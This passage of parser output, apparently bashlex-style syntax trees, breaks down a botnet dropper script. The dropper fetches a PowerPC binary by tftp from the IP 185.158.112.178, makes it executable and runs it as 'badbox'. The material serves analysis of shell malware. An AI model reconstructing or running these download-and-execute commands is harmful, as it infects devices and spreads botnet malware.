  OperatorNode(lineno=15, op=';', pos=(1634, 1635)),
  CommandNode(lineno=15, pos=(1635, 1645), parts=[
    WordNode(lineno=15, pos=(1635, 1640), word='chmod'),
    WordNode(lineno=15, pos=(1641, 1643), word='+x'),
    WordNode(lineno=15, pos=(1644, 1645), word='*'),
  ]),
  OperatorNode(lineno=15, op=';', pos=(1645, 1646)),
  CommandNode(lineno=15, pos=(1646, 1654), parts=[
    WordNode(lineno=15, pos=(1646, 1654), word='./badbox'),
  ]),
])
ListNode(lineno=16, pos=(1655, 1792), parts=[
  CommandNode(lineno=16, pos=(1655, 1662), parts=[
    WordNode(lineno=16, pos=(1655, 1657), word='cd'),
    WordNode(lineno=16, pos=(1658, 1662), word='/tmp'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1663, 1665)),
  CommandNode(lineno=16, pos=(1666, 1677), parts=[
    WordNode(lineno=16, pos=(1666, 1668), word='cd'),
    WordNode(lineno=16, pos=(1669, 1677), word='/var/run'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1678, 1680)),
  CommandNode(lineno=16, pos=(1681, 1688), parts=[
    WordNode(lineno=16, pos=(1681, 1683), word='cd'),
    WordNode(lineno=16, pos=(1684, 1688), word='/mnt'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1689, 1691)),
  CommandNode(lineno=16, pos=(1692, 1700), parts=[
    WordNode(lineno=16, pos=(1692, 1694), word='cd'),
    WordNode(lineno=16, pos=(1695, 1700), word='/root'),
  ]),
  OperatorNode(lineno=16, op='||', pos=(1701, 1703)),
  CommandNode(lineno=16, pos=(1704, 1708), parts=[
    WordNode(lineno=16, pos=(1704, 1706), word='cd'),
    WordNode(lineno=16, pos=(1707, 1708), word='/'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1708, 1709)),
  CommandNode(lineno=16, pos=(1710, 1748), parts=[
    WordNode(lineno=16, pos=(1710, 1714), word='tftp'),
    WordNode(lineno=16, pos=(1715, 1717), word='-r'),
    WordNode(lineno=16, pos=(1718, 1729), word='oxca.ppc440'),
    WordNode(lineno=16, pos=(1730, 1732), word='-g'),
    WordNode(lineno=16, pos=(1733, 1748), word='185.158.112.178'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1748, 1749)),
  CommandNode(lineno=16, pos=(1749, 1772), parts=[
    WordNode(lineno=16, pos=(1749, 1752), word='cat'),
    WordNode(lineno=16, pos=(1753, 1764), word='oxca.ppc440'),
    RedirectNode(lineno=16, output=
      WordNode(lineno=16, pos=(1766, 1772), word='badbox'), pos=(1765, 1772), type='>'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1772, 1773)),
  CommandNode(lineno=16, pos=(1773, 1783), parts=[
    WordNode(lineno=16, pos=(1773, 1778), word='chmod'),
    WordNode(lineno=16, pos=(1779, 1781), word='+x'),
    WordNode(lineno=16, pos=(1782, 1783), word='*'),
  ]),
  OperatorNode(lineno=16, op=';', pos=(1783, 1784)),
  CommandNode(lineno=16, pos=(1784, 1792), parts=[
    WordNode(lineno=16, pos=(1784, 1792), word='./badbox'),
  ]),
])
